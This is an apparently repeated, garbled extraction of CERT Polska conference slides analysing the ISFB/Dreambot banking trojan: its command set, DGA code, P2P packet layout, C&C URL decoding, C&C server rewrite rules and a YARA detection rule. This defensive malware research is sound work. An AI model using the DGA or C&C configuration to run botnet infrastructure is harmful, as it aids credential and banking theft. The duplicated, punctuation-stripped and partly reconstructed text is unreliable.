    RewriteRule ^images/(.*)\.(jpeg) new_chandler.php?q=$1.$2 [L,QSA]

Dreambot

    rule isfb_dreambot : banker
    {
        meta:
            author = "mak"
            module = "isfb"
        strings:
            $str0 = "vmware" fullword
            $str1 = "vbox" fullword
            $str2 = "virtual hd" fullword
            $str4 = "qemu" fullword
            $str3 = "c321.txt" fullword
        condition:
            all of them and isfb_dropper
    }

The End... or not

Offsprings and Cousins

Common Roots / Payloads

· Nymaim
· Powersniff, PunchyBagg

· Bolek/KBOT - based on gozi
· Rovnix - ISFB was the ring3 payload protected by rovnix
· Vawtrak - nothing in common

Recap

· One of the oldest bankers under active development
· Interesting solutions
· Various methods of infection
· Elaborate communication methods: DGA, P2P, TOR
· Old bugs die hard
· Read the paper for more details
· Code soon available at mak's github: random-stuff/isfb

Kudos: people who knowingly (or not) helped us

· Slavo
· Paul Black
· Kafeine
· Peter Kruse
· Piotr Kijewski
· Jarosław Jedynak
· Horgh
· Frank Ruiz

Q & A

· info@cert.pl, www.cert.pl
· CERTPolska
· CERTPolska_en
· mak, mak@cert.pl

Page 30: ISFB - Botconf 2020 · 2016. 12. 2. · 02/12/2016 ISFB  1/58 ISFB Still Live and Kicking Maciej Kotowicz

02122016 ISFB

httpslokalhostpltalksbotconf20161 3058

The Bot

Registry Keys

02122016 ISFB

httpslokalhostpltalksbotconf20161 3158

Registry KeysSoftwareAppDataLowSoftwareMicrosoft [A‐F0‐9]8‐[A‐F0‐9]4‐[A‐F0‐9]4‐[A‐F0‐9]4‐[A‐F0‐9]12

InstallClientNetCfgLastTaskLastConfig

middotmiddotmiddotmiddotmiddot

3158

02122016 ISFB

httpslokalhostpltalksbotconf20161 3258

Other Acctions

GET_CERTSGET_COOKIESGET_SYSINFOLOAD_EXEGET_FILESSOCKS_STARTGET_KEYLOGGET_MAILGET_FTPVNC_STARTURL_BLOCK

middotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddot

3258

02122016 ISFB

httpslokalhostpltalksbotconf20161 3358

Calling Home

02122016 ISFB

httpslokalhostpltalksbotconf20161 3458

ET phone home

Static domains inside configuration filesDGA based on template and current dataCampC hidden in TOR networkP2P network

middotmiddotmiddotmiddot

3458

02122016 ISFB

httpslokalhostpltalksbotconf20161 3558

DGA rnd = LsaRandom() rndseed = (((kwargs[seed] ltlt 16)amp0xffffffff) + kwargs[season] + kwargs[lsa_seed]) amp 0xffffffff rndseed = (1 ltlt 16) + kwargs[season] ‐ 0x124676D0 r=[] for i in range(kwargs[count]) suf = kwargs[tld][(rndrnd gtgt 1) len(kwargs[tld])]rndchoose(kwargs[tld]) dom_l = rndrnd selfDGA_MIN_LEN + selfDGA_MIN_LEN wc = 0 dom = [] while wc lt dom_l d = rndchoose(words) ws = len(d) if not rndrnd 3 ws =2 if wc + ws gt selfDGA_MAX_LEN continue domappend(d[ws]) wc += ws rappend(join(dom) +suf)

PYTHON

3558

TOR

02122016 ISFB

httpslokalhostpltalksbotconf20161 3658

TOR

3658

02122016 ISFB

httpslokalhostpltalksbotconf20161 3758

P2P typedef struct DWORD magic 0x395f2ec1 DWORD my_secret DWORD his_secret BYTE cmd0 BYTE cmd1 BYTE data[] isfb_p2p_inner_packet typedef struct BYTE flags DWORD salt 4 random higher bytes of keys isfb_p2p_inner_packet p encrypted isfb_p2p_packet

C

3758

02122016 ISFB

httpslokalhostpltalksbotconf20161 3858

Internet is Hard

3858

02122016 ISFB

httpslokalhostpltalksbotconf20161 3958

URL formathttpssuser5fid=4uampversion5fid=luamppassphrase=sampsocks=luampversion=luampcrc=8x tfctqphpmkvf=KPgnjc3RohdH4zDttU9wItzEGB6cEz2jeDJWROI6FbIpqN9F6N3OOHUzISvptToYm+txOpUvU2YtY oxsxc=kcxsfxampversion=212356ampuser=aa16a132f1689c4d4b2eb59024d986c3ampserver=12ampid=1000ampcrc=1dc690f cnctldimages8Gmj7f1bp976veQbwY5XTyLFJl2QiH3b3X6ts7Yxd7nmkuXV6Yrt6mPUdSf2Ul jOBc27CVHf2WIxVsGgPv49qA_2B_2FdeXKWKVcPIuyXr4JBumUByAwRtPom91zP7FSaj2Ujpeg t[RAND][RAND]=data

3958

02122016 ISFB

httpslokalhostpltalksbotconf20161 4058

URL formatdecode_req = lambda d decrypt(ddecode(base64SKEY)) d=resub(_([0‐9A‐Fa‐f]2)lambda x chr(int(xgroup(1)16))d) try e=ddecode(base64) except Exception as e d=d+== pprintpprint(dict(map(lambda x xsplit(=) decode_req(d)strip(x00)split(amp))))

PYTHON

crc 7001380 id 1065ppc xi server 12 soft 1 user 0c0d784a0cf755970edbdf4c0cb27fca version 214887

4058

URL format

02122016 ISFB

httpslokalhostpltalksbotconf20161 4158

URL formattphp amp get new task amp Used until Sep 2015 cphp amp get new config amp Used until Sep 2015 dphp amp send stolen data amp Used until Sep 2015 imagesgif amp get new task amp current format imagesjpeg amp get new config amp current format imagesbmp amp send stolen data amp current format imagesavi amp download 2nd stage dll amp not every campc

4158

02122016 ISFB

httpslokalhostpltalksbotconf20161 4258

CampC respone

4258

02122016 ISFB

httpslokalhostpltalksbotconf20161 4358

CampC respone

4358

02122016 ISFB

httpslokalhostpltalksbotconf20161 4458

Wiki

Serpent is a symmetric key block cipher that was a finalistin the Advanced Encryption Standard (AES) contest whereit was ranked second to Rijndael Serpent was designed byRoss Anderson Eli Biham and Lars Knudsen

Like other AES submissions Serpent has a block size of128 bits and supports a key size of 128 192 or 256 bits[2]The cipher is a 32-round substitution-permutationnetwork operating on a block of four 32-bit words Eachround applies one of eight 4-bit to 4-bit S-boxes 32 timesin parallel Serpent was designed so that all operations canbe executed in parallel using 32 bit slices This maximizesparallelism but also allows use of the extensivecryptanalysis work performed on DES

4458

02122016 ISFB

httpslokalhostpltalksbotconf20161 4558

CampC respone

4558

02122016 ISFB

httpslokalhostpltalksbotconf20161 4658

Command and Control

02122016 ISFB

httpslokalhostpltalksbotconf20161 4758

IAPrewrite ^fileto()(bin) get128phpx=$1 break rewrite ^images()(bmp) dataphpx=$1$2 break rewrite ^images()(avi) loaderphpx=$1$2 break rewrite ^images()(gif) taskphpx=$1$2 break rewrite ^images()(jpeg) configphpx=$1$2 break

4758

02122016 ISFB

httpslokalhostpltalksbotconf20161 4858

IAP

4858

02122016 ISFB

httpslokalhostpltalksbotconf20161 4958

IAP

4958

02122016 ISFB

httpslokalhostpltalksbotconf20161 5058

DreambotRewriteEngine on RewriteRule ^c(+)php$ new_chandlerphp [LQSA] RewriteRule ^t(+)php$ new_thandlerphp [LQSA] RewriteRule ^d(+)php$ new_dhandlerphp [LQSA] RewriteRule ^images()(bmp) new_dhandlerphpq=$1$2 [LQSA] RewriteRule ^images()(gif) new_thandlerphpq=$1$2 [LQSA] RewriteRule ^images()(jpeg) new_chandlerphpq=$1$2 [LQSA]

5058

Dreambot

02122016 ISFB

httpslokalhostpltalksbotconf20161 5158

Dreambot

5158

02122016 ISFB

httpslokalhostpltalksbotconf20161 5258

Dreambot

5258

02122016 ISFB

httpslokalhostpltalksbotconf20161 5358

Dreambotrule isfb_dreambot banker meta author = mak module = isfb strings $str0 = vmware fullword $str1 = vbox fullword $str2 = virtual hd fullword $str4 = qemu fullword $str3 = c321txt fullword condition all of them and isfb_dropper

5358

02122016 ISFB

httpslokalhostpltalksbotconf20161 5458

The Endor not

02122016 ISFB

httpslokalhostpltalksbotconf20161 5558

Offsprings and Cousins

Common RootsPayloads

NymainPowersniff PunchyBagg

middotmiddot

BolekKBOT - based on goziRovnix - ISFB was ring3 payload protected by rovnixVawtrak - Nothing in common

middotmiddotmiddot

5558

Recap

02122016 ISFB

httpslokalhostpltalksbotconf20161 5658

Recap

One of the oldest bankers under active developmentInteresting solutionsVarious methods of infectionElaborate communication methods DGAP2PTOROld bugs die hard]Read paper for more details]Code soon available at makgithubrandom-stuffisfb

middotmiddotmiddotmiddotmiddotmiddotmiddot

5658

02122016 ISFB

httpslokalhostpltalksbotconf20161 5758

Kudospeople that knowingly (or not) halped us

SlavoPaul BlackKafeinePeter KrusePiotr KijewskiJarosław JedynakHorghFrank Ruiz

middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot

5758

02122016 ISFB

httpslokalhostpltalksbotconf20161 5858

Q amp A

infocertpl wwwcertpl

CERTPolska CERTPolska

CERTPolska CERTPolska_en

mak makcertpl

Page 31: ISFB - Botconf 2020 · 2016. 12. 2. · 02/12/2016 ISFB  1/58 ISFB Still Live and Kicking Maciej Kotowicz

02122016 ISFB

httpslokalhostpltalksbotconf20161 3158

Registry KeysSoftwareAppDataLowSoftwareMicrosoft [A‐F0‐9]8‐[A‐F0‐9]4‐[A‐F0‐9]4‐[A‐F0‐9]4‐[A‐F0‐9]12

InstallClientNetCfgLastTaskLastConfig

middotmiddotmiddotmiddotmiddot

3158

02122016 ISFB

httpslokalhostpltalksbotconf20161 3258

Other Acctions

GET_CERTSGET_COOKIESGET_SYSINFOLOAD_EXEGET_FILESSOCKS_STARTGET_KEYLOGGET_MAILGET_FTPVNC_STARTURL_BLOCK

middotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddot

3258

02122016 ISFB

httpslokalhostpltalksbotconf20161 3358

Calling Home

02122016 ISFB

httpslokalhostpltalksbotconf20161 3458

ET phone home

Static domains inside configuration filesDGA based on template and current dataCampC hidden in TOR networkP2P network

middotmiddotmiddotmiddot

3458

02122016 ISFB

httpslokalhostpltalksbotconf20161 3558

DGA rnd = LsaRandom() rndseed = (((kwargs[seed] ltlt 16)amp0xffffffff) + kwargs[season] + kwargs[lsa_seed]) amp 0xffffffff rndseed = (1 ltlt 16) + kwargs[season] ‐ 0x124676D0 r=[] for i in range(kwargs[count]) suf = kwargs[tld][(rndrnd gtgt 1) len(kwargs[tld])]rndchoose(kwargs[tld]) dom_l = rndrnd selfDGA_MIN_LEN + selfDGA_MIN_LEN wc = 0 dom = [] while wc lt dom_l d = rndchoose(words) ws = len(d) if not rndrnd 3 ws =2 if wc + ws gt selfDGA_MAX_LEN continue domappend(d[ws]) wc += ws rappend(join(dom) +suf)

PYTHON

3558

TOR

02122016 ISFB

httpslokalhostpltalksbotconf20161 3658

TOR

3658

02122016 ISFB

httpslokalhostpltalksbotconf20161 3758

P2P typedef struct DWORD magic 0x395f2ec1 DWORD my_secret DWORD his_secret BYTE cmd0 BYTE cmd1 BYTE data[] isfb_p2p_inner_packet typedef struct BYTE flags DWORD salt 4 random higher bytes of keys isfb_p2p_inner_packet p encrypted isfb_p2p_packet

C

3758

02122016 ISFB

httpslokalhostpltalksbotconf20161 3858

Internet is Hard

3858

02122016 ISFB

httpslokalhostpltalksbotconf20161 3958

URL formathttpssuser5fid=4uampversion5fid=luamppassphrase=sampsocks=luampversion=luampcrc=8x tfctqphpmkvf=KPgnjc3RohdH4zDttU9wItzEGB6cEz2jeDJWROI6FbIpqN9F6N3OOHUzISvptToYm+txOpUvU2YtY oxsxc=kcxsfxampversion=212356ampuser=aa16a132f1689c4d4b2eb59024d986c3ampserver=12ampid=1000ampcrc=1dc690f cnctldimages8Gmj7f1bp976veQbwY5XTyLFJl2QiH3b3X6ts7Yxd7nmkuXV6Yrt6mPUdSf2Ul jOBc27CVHf2WIxVsGgPv49qA_2B_2FdeXKWKVcPIuyXr4JBumUByAwRtPom91zP7FSaj2Ujpeg t[RAND][RAND]=data

3958

02122016 ISFB

httpslokalhostpltalksbotconf20161 4058

URL formatdecode_req = lambda d decrypt(ddecode(base64SKEY)) d=resub(_([0‐9A‐Fa‐f]2)lambda x chr(int(xgroup(1)16))d) try e=ddecode(base64) except Exception as e d=d+== pprintpprint(dict(map(lambda x xsplit(=) decode_req(d)strip(x00)split(amp))))

PYTHON

crc 7001380 id 1065ppc xi server 12 soft 1 user 0c0d784a0cf755970edbdf4c0cb27fca version 214887

4058

URL format

02122016 ISFB

httpslokalhostpltalksbotconf20161 4158

URL formattphp amp get new task amp Used until Sep 2015 cphp amp get new config amp Used until Sep 2015 dphp amp send stolen data amp Used until Sep 2015 imagesgif amp get new task amp current format imagesjpeg amp get new config amp current format imagesbmp amp send stolen data amp current format imagesavi amp download 2nd stage dll amp not every campc

4158

02122016 ISFB

httpslokalhostpltalksbotconf20161 4258

CampC respone

4258

02122016 ISFB

httpslokalhostpltalksbotconf20161 4358

CampC respone

4358

02122016 ISFB

httpslokalhostpltalksbotconf20161 4458

Wiki

Serpent is a symmetric key block cipher that was a finalistin the Advanced Encryption Standard (AES) contest whereit was ranked second to Rijndael Serpent was designed byRoss Anderson Eli Biham and Lars Knudsen

Like other AES submissions Serpent has a block size of128 bits and supports a key size of 128 192 or 256 bits[2]The cipher is a 32-round substitution-permutationnetwork operating on a block of four 32-bit words Eachround applies one of eight 4-bit to 4-bit S-boxes 32 timesin parallel Serpent was designed so that all operations canbe executed in parallel using 32 bit slices This maximizesparallelism but also allows use of the extensivecryptanalysis work performed on DES

4458

02122016 ISFB

httpslokalhostpltalksbotconf20161 4558

CampC respone

4558

02122016 ISFB

httpslokalhostpltalksbotconf20161 4658

Command and Control

02122016 ISFB

httpslokalhostpltalksbotconf20161 4758

IAPrewrite ^fileto()(bin) get128phpx=$1 break rewrite ^images()(bmp) dataphpx=$1$2 break rewrite ^images()(avi) loaderphpx=$1$2 break rewrite ^images()(gif) taskphpx=$1$2 break rewrite ^images()(jpeg) configphpx=$1$2 break

4758

02122016 ISFB

httpslokalhostpltalksbotconf20161 4858

IAP

4858

02122016 ISFB

httpslokalhostpltalksbotconf20161 4958

IAP

4958

02122016 ISFB

httpslokalhostpltalksbotconf20161 5058

DreambotRewriteEngine on RewriteRule ^c(+)php$ new_chandlerphp [LQSA] RewriteRule ^t(+)php$ new_thandlerphp [LQSA] RewriteRule ^d(+)php$ new_dhandlerphp [LQSA] RewriteRule ^images()(bmp) new_dhandlerphpq=$1$2 [LQSA] RewriteRule ^images()(gif) new_thandlerphpq=$1$2 [LQSA] RewriteRule ^images()(jpeg) new_chandlerphpq=$1$2 [LQSA]

5058

Dreambot

02122016 ISFB

httpslokalhostpltalksbotconf20161 5158

Dreambot

5158

02122016 ISFB

httpslokalhostpltalksbotconf20161 5258

Dreambot

5258

02122016 ISFB

httpslokalhostpltalksbotconf20161 5358

Dreambotrule isfb_dreambot banker meta author = mak module = isfb strings $str0 = vmware fullword $str1 = vbox fullword $str2 = virtual hd fullword $str4 = qemu fullword $str3 = c321txt fullword condition all of them and isfb_dropper

5358

02122016 ISFB

httpslokalhostpltalksbotconf20161 5458

The Endor not

02122016 ISFB

httpslokalhostpltalksbotconf20161 5558

Offsprings and Cousins

Common RootsPayloads

NymainPowersniff PunchyBagg

middotmiddot

BolekKBOT - based on goziRovnix - ISFB was ring3 payload protected by rovnixVawtrak - Nothing in common

middotmiddotmiddot

5558

Recap

02122016 ISFB

httpslokalhostpltalksbotconf20161 5658

Recap

One of the oldest bankers under active developmentInteresting solutionsVarious methods of infectionElaborate communication methods DGAP2PTOROld bugs die hard]Read paper for more details]Code soon available at makgithubrandom-stuffisfb

middotmiddotmiddotmiddotmiddotmiddotmiddot

5658

02122016 ISFB

httpslokalhostpltalksbotconf20161 5758

Kudospeople that knowingly (or not) halped us

SlavoPaul BlackKafeinePeter KrusePiotr KijewskiJarosław JedynakHorghFrank Ruiz

middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot

5758

02122016 ISFB

httpslokalhostpltalksbotconf20161 5858

Q amp A

infocertpl wwwcertpl

CERTPolska CERTPolska

CERTPolska CERTPolska_en

mak makcertpl

Page 32: ISFB - Botconf 2020 · 2016. 12. 2. · 02/12/2016 ISFB  1/58 ISFB Still Live and Kicking Maciej Kotowicz

02122016 ISFB

httpslokalhostpltalksbotconf20161 3258

Other Acctions

GET_CERTSGET_COOKIESGET_SYSINFOLOAD_EXEGET_FILESSOCKS_STARTGET_KEYLOGGET_MAILGET_FTPVNC_STARTURL_BLOCK

middotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddot

3258

02122016 ISFB

httpslokalhostpltalksbotconf20161 3358

Calling Home

02122016 ISFB

httpslokalhostpltalksbotconf20161 3458

ET phone home

Static domains inside configuration filesDGA based on template and current dataCampC hidden in TOR networkP2P network

middotmiddotmiddotmiddot

3458

02122016 ISFB

httpslokalhostpltalksbotconf20161 3558

DGA rnd = LsaRandom() rndseed = (((kwargs[seed] ltlt 16)amp0xffffffff) + kwargs[season] + kwargs[lsa_seed]) amp 0xffffffff rndseed = (1 ltlt 16) + kwargs[season] ‐ 0x124676D0 r=[] for i in range(kwargs[count]) suf = kwargs[tld][(rndrnd gtgt 1) len(kwargs[tld])]rndchoose(kwargs[tld]) dom_l = rndrnd selfDGA_MIN_LEN + selfDGA_MIN_LEN wc = 0 dom = [] while wc lt dom_l d = rndchoose(words) ws = len(d) if not rndrnd 3 ws =2 if wc + ws gt selfDGA_MAX_LEN continue domappend(d[ws]) wc += ws rappend(join(dom) +suf)

PYTHON

3558

TOR

02122016 ISFB

httpslokalhostpltalksbotconf20161 3658

TOR

3658

02122016 ISFB

httpslokalhostpltalksbotconf20161 3758

P2P typedef struct DWORD magic 0x395f2ec1 DWORD my_secret DWORD his_secret BYTE cmd0 BYTE cmd1 BYTE data[] isfb_p2p_inner_packet typedef struct BYTE flags DWORD salt 4 random higher bytes of keys isfb_p2p_inner_packet p encrypted isfb_p2p_packet

C

3758

02122016 ISFB

httpslokalhostpltalksbotconf20161 3858

Internet is Hard

3858

02122016 ISFB

httpslokalhostpltalksbotconf20161 3958

URL formathttpssuser5fid=4uampversion5fid=luamppassphrase=sampsocks=luampversion=luampcrc=8x tfctqphpmkvf=KPgnjc3RohdH4zDttU9wItzEGB6cEz2jeDJWROI6FbIpqN9F6N3OOHUzISvptToYm+txOpUvU2YtY oxsxc=kcxsfxampversion=212356ampuser=aa16a132f1689c4d4b2eb59024d986c3ampserver=12ampid=1000ampcrc=1dc690f cnctldimages8Gmj7f1bp976veQbwY5XTyLFJl2QiH3b3X6ts7Yxd7nmkuXV6Yrt6mPUdSf2Ul jOBc27CVHf2WIxVsGgPv49qA_2B_2FdeXKWKVcPIuyXr4JBumUByAwRtPom91zP7FSaj2Ujpeg t[RAND][RAND]=data

3958

02122016 ISFB

httpslokalhostpltalksbotconf20161 4058

URL formatdecode_req = lambda d decrypt(ddecode(base64SKEY)) d=resub(_([0‐9A‐Fa‐f]2)lambda x chr(int(xgroup(1)16))d) try e=ddecode(base64) except Exception as e d=d+== pprintpprint(dict(map(lambda x xsplit(=) decode_req(d)strip(x00)split(amp))))

PYTHON

crc 7001380 id 1065ppc xi server 12 soft 1 user 0c0d784a0cf755970edbdf4c0cb27fca version 214887

4058

URL format

02122016 ISFB

httpslokalhostpltalksbotconf20161 4158

URL formattphp amp get new task amp Used until Sep 2015 cphp amp get new config amp Used until Sep 2015 dphp amp send stolen data amp Used until Sep 2015 imagesgif amp get new task amp current format imagesjpeg amp get new config amp current format imagesbmp amp send stolen data amp current format imagesavi amp download 2nd stage dll amp not every campc

4158

02122016 ISFB

httpslokalhostpltalksbotconf20161 4258

CampC respone

4258

02122016 ISFB

httpslokalhostpltalksbotconf20161 4358

CampC respone

4358

02122016 ISFB

httpslokalhostpltalksbotconf20161 4458

Wiki

Serpent is a symmetric key block cipher that was a finalistin the Advanced Encryption Standard (AES) contest whereit was ranked second to Rijndael Serpent was designed byRoss Anderson Eli Biham and Lars Knudsen

Like other AES submissions Serpent has a block size of128 bits and supports a key size of 128 192 or 256 bits[2]The cipher is a 32-round substitution-permutationnetwork operating on a block of four 32-bit words Eachround applies one of eight 4-bit to 4-bit S-boxes 32 timesin parallel Serpent was designed so that all operations canbe executed in parallel using 32 bit slices This maximizesparallelism but also allows use of the extensivecryptanalysis work performed on DES

4458

02122016 ISFB

httpslokalhostpltalksbotconf20161 4558

CampC respone

4558

02122016 ISFB

httpslokalhostpltalksbotconf20161 4658

Command and Control

02122016 ISFB

httpslokalhostpltalksbotconf20161 4758

IAPrewrite ^fileto()(bin) get128phpx=$1 break rewrite ^images()(bmp) dataphpx=$1$2 break rewrite ^images()(avi) loaderphpx=$1$2 break rewrite ^images()(gif) taskphpx=$1$2 break rewrite ^images()(jpeg) configphpx=$1$2 break

4758

02122016 ISFB

httpslokalhostpltalksbotconf20161 4858

IAP

4858

02122016 ISFB

httpslokalhostpltalksbotconf20161 4958

IAP

4958

02122016 ISFB

httpslokalhostpltalksbotconf20161 5058

DreambotRewriteEngine on RewriteRule ^c(+)php$ new_chandlerphp [LQSA] RewriteRule ^t(+)php$ new_thandlerphp [LQSA] RewriteRule ^d(+)php$ new_dhandlerphp [LQSA] RewriteRule ^images()(bmp) new_dhandlerphpq=$1$2 [LQSA] RewriteRule ^images()(gif) new_thandlerphpq=$1$2 [LQSA] RewriteRule ^images()(jpeg) new_chandlerphpq=$1$2 [LQSA]

5058

Dreambot

02122016 ISFB

httpslokalhostpltalksbotconf20161 5158

Dreambot

5158

02122016 ISFB

httpslokalhostpltalksbotconf20161 5258

Dreambot

5258

02122016 ISFB

httpslokalhostpltalksbotconf20161 5358

Dreambotrule isfb_dreambot banker meta author = mak module = isfb strings $str0 = vmware fullword $str1 = vbox fullword $str2 = virtual hd fullword $str4 = qemu fullword $str3 = c321txt fullword condition all of them and isfb_dropper

5358

02122016 ISFB

httpslokalhostpltalksbotconf20161 5458

The Endor not

02122016 ISFB

httpslokalhostpltalksbotconf20161 5558

Offsprings and Cousins

Common RootsPayloads

NymainPowersniff PunchyBagg

middotmiddot

BolekKBOT - based on goziRovnix - ISFB was ring3 payload protected by rovnixVawtrak - Nothing in common

middotmiddotmiddot

5558

Recap

02122016 ISFB

httpslokalhostpltalksbotconf20161 5658

Recap

One of the oldest bankers under active developmentInteresting solutionsVarious methods of infectionElaborate communication methods DGAP2PTOROld bugs die hard]Read paper for more details]Code soon available at makgithubrandom-stuffisfb

middotmiddotmiddotmiddotmiddotmiddotmiddot

5658

02122016 ISFB

httpslokalhostpltalksbotconf20161 5758

Kudospeople that knowingly (or not) halped us

SlavoPaul BlackKafeinePeter KrusePiotr KijewskiJarosław JedynakHorghFrank Ruiz

middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot

5758

02122016 ISFB

httpslokalhostpltalksbotconf20161 5858

Q amp A

infocertpl wwwcertpl

CERTPolska CERTPolska

CERTPolska CERTPolska_en

mak makcertpl

Page 33: ISFB - Botconf 2020 · 2016. 12. 2. · 02/12/2016 ISFB  1/58 ISFB Still Live and Kicking Maciej Kotowicz

02122016 ISFB

httpslokalhostpltalksbotconf20161 3358

Calling Home

02122016 ISFB

httpslokalhostpltalksbotconf20161 3458

ET phone home

Static domains inside configuration filesDGA based on template and current dataCampC hidden in TOR networkP2P network

middotmiddotmiddotmiddot

3458

02122016 ISFB

httpslokalhostpltalksbotconf20161 3558

DGA rnd = LsaRandom() rndseed = (((kwargs[seed] ltlt 16)amp0xffffffff) + kwargs[season] + kwargs[lsa_seed]) amp 0xffffffff rndseed = (1 ltlt 16) + kwargs[season] ‐ 0x124676D0 r=[] for i in range(kwargs[count]) suf = kwargs[tld][(rndrnd gtgt 1) len(kwargs[tld])]rndchoose(kwargs[tld]) dom_l = rndrnd selfDGA_MIN_LEN + selfDGA_MIN_LEN wc = 0 dom = [] while wc lt dom_l d = rndchoose(words) ws = len(d) if not rndrnd 3 ws =2 if wc + ws gt selfDGA_MAX_LEN continue domappend(d[ws]) wc += ws rappend(join(dom) +suf)

PYTHON

3558

TOR

02122016 ISFB

httpslokalhostpltalksbotconf20161 3658

TOR

3658

02122016 ISFB

httpslokalhostpltalksbotconf20161 3758

P2P typedef struct DWORD magic 0x395f2ec1 DWORD my_secret DWORD his_secret BYTE cmd0 BYTE cmd1 BYTE data[] isfb_p2p_inner_packet typedef struct BYTE flags DWORD salt 4 random higher bytes of keys isfb_p2p_inner_packet p encrypted isfb_p2p_packet

C

3758

02122016 ISFB

httpslokalhostpltalksbotconf20161 3858

Internet is Hard

3858

02122016 ISFB

httpslokalhostpltalksbotconf20161 3958

URL formathttpssuser5fid=4uampversion5fid=luamppassphrase=sampsocks=luampversion=luampcrc=8x tfctqphpmkvf=KPgnjc3RohdH4zDttU9wItzEGB6cEz2jeDJWROI6FbIpqN9F6N3OOHUzISvptToYm+txOpUvU2YtY oxsxc=kcxsfxampversion=212356ampuser=aa16a132f1689c4d4b2eb59024d986c3ampserver=12ampid=1000ampcrc=1dc690f cnctldimages8Gmj7f1bp976veQbwY5XTyLFJl2QiH3b3X6ts7Yxd7nmkuXV6Yrt6mPUdSf2Ul jOBc27CVHf2WIxVsGgPv49qA_2B_2FdeXKWKVcPIuyXr4JBumUByAwRtPom91zP7FSaj2Ujpeg t[RAND][RAND]=data

3958

02122016 ISFB

httpslokalhostpltalksbotconf20161 4058

URL formatdecode_req = lambda d decrypt(ddecode(base64SKEY)) d=resub(_([0‐9A‐Fa‐f]2)lambda x chr(int(xgroup(1)16))d) try e=ddecode(base64) except Exception as e d=d+== pprintpprint(dict(map(lambda x xsplit(=) decode_req(d)strip(x00)split(amp))))

PYTHON

crc 7001380 id 1065ppc xi server 12 soft 1 user 0c0d784a0cf755970edbdf4c0cb27fca version 214887

4058

URL format

02122016 ISFB

httpslokalhostpltalksbotconf20161 4158

URL formattphp amp get new task amp Used until Sep 2015 cphp amp get new config amp Used until Sep 2015 dphp amp send stolen data amp Used until Sep 2015 imagesgif amp get new task amp current format imagesjpeg amp get new config amp current format imagesbmp amp send stolen data amp current format imagesavi amp download 2nd stage dll amp not every campc

4158

02122016 ISFB

httpslokalhostpltalksbotconf20161 4258

CampC respone

4258

02122016 ISFB

httpslokalhostpltalksbotconf20161 4358

CampC respone

4358

02122016 ISFB

httpslokalhostpltalksbotconf20161 4458

Wiki

Serpent is a symmetric key block cipher that was a finalistin the Advanced Encryption Standard (AES) contest whereit was ranked second to Rijndael Serpent was designed byRoss Anderson Eli Biham and Lars Knudsen

Like other AES submissions Serpent has a block size of128 bits and supports a key size of 128 192 or 256 bits[2]The cipher is a 32-round substitution-permutationnetwork operating on a block of four 32-bit words Eachround applies one of eight 4-bit to 4-bit S-boxes 32 timesin parallel Serpent was designed so that all operations canbe executed in parallel using 32 bit slices This maximizesparallelism but also allows use of the extensivecryptanalysis work performed on DES

4458

02122016 ISFB

httpslokalhostpltalksbotconf20161 4558

CampC respone

4558

Command and Control

IAP

    # nginx rewrite rules from the IAP C&C; slashes, '.*' and escapes were lost
    # in extraction and are restored here
    rewrite ^/fileto/(.*)\.(bin)   /get128.php?x=$1    break;
    rewrite ^/images/(.*)\.(bmp)   /data.php?x=$1$2    break;
    rewrite ^/images/(.*)\.(avi)   /loader.php?x=$1$2  break;
    rewrite ^/images/(.*)\.(gif)   /task.php?x=$1$2    break;
    rewrite ^/images/(.*)\.(jpeg)  /config.php?x=$1$2  break;

Dreambot

    # Apache .htaccess from a Dreambot C&C; slashes and escapes restored after extraction
    RewriteEngine on
    RewriteRule ^c(.+)\.php$         new_chandler.php          [L,QSA]
    RewriteRule ^t(.+)\.php$         new_thandler.php          [L,QSA]
    RewriteRule ^d(.+)\.php$         new_dhandler.php          [L,QSA]
    RewriteRule ^images/(.*)\.(bmp)  new_dhandler.php?q=$1$2   [L,QSA]
    RewriteRule ^images/(.*)\.(gif)  new_thandler.php?q=$1$2   [L,QSA]
    RewriteRule ^images/(.*)\.(jpeg) new_chandler.php?q=$1$2   [L,QSA]

Dreambot

    // isfb_dropper is a separate rule not shown on the slide; the path in $str3
    // lost its punctuation in extraction and is restored as the file Dreambot checks for
    rule isfb_dreambot : banker
    {
        meta:
            author = "mak"
            module = "isfb"
        strings:
            $str0 = "vmware" fullword
            $str1 = "vbox" fullword
            $str2 = "virtual hd" fullword
            $str4 = "qemu" fullword
            $str3 = "c:\\321.txt" fullword
        condition:
            all of them and isfb_dropper
    }

The End... or not

Offsprings and Cousins

Common Roots
· Bolek/KBOT - based on Gozi
· Rovnix - ISFB was the ring3 payload protected by Rovnix
· Vawtrak - nothing in common

Payloads
· Nymaim
· Powersniff / PunchyBagg

Recap
· One of the oldest bankers under active development
· Interesting solutions
· Various methods of infection
· Elaborate communication methods: DGA, P2P, TOR
· Old bugs die hard
· Read the paper for more details
· Code soon available in mak's random-stuff/isfb repository on GitHub

Kudos
people that knowingly (or not) helped us
· Slavo
· Paul Black
· Kafeine
· Peter Kruse
· Piotr Kijewski
· Jarosław Jedynak
· Horgh
· Frank Ruiz

Q & A

info@cert.pl    www.cert.pl
CERTPolska      CERTPolska
CERTPolska      CERTPolska_en
mak             mak@cert.pl

ET phone home
· Static domains inside configuration files
· DGA based on a template and the current date
· C&C hidden in the TOR network
· P2P network

DGA

    # Fragment of the author's DGA reimplementation: LsaRandom (the bot's PRNG), words
    # (the template text) and kwargs (seed, season, lsa_seed, tld, count) are defined
    # elsewhere and not shown on the slide
    rnd = LsaRandom()
    rnd.seed = (((kwargs['seed'] << 16) & 0xffffffff) + kwargs['season'] + kwargs['lsa_seed']) & 0xffffffff
    rnd.seed = (1 << 16) + kwargs['season'] - 0x124676D0   # second seeding as shown on the slide
    r = []
    for i in range(kwargs['count']):
        suf = kwargs['tld'][(rnd.rnd() >> 1) % len(kwargs['tld'])]   # rnd.choose(kwargs['tld'])
        dom_l = rnd.rnd() % self.DGA_MIN_LEN + self.DGA_MIN_LEN
        wc = 0
        dom = []
        while wc < dom_l:
            d = rnd.choose(words)
            ws = len(d)
            if not rnd.rnd() % 3:
                ws /= 2          # operator garbled in extraction; every third word is cut to its first half
            if wc + ws > self.DGA_MAX_LEN:
                continue
            dom.append(d[:ws])
            wc += ws
        r.append(''.join(dom) + suf)

PYTHON

TOR

P2P

    typedef struct {
        DWORD magic;        // 0x395f2ec1
        DWORD my_secret;
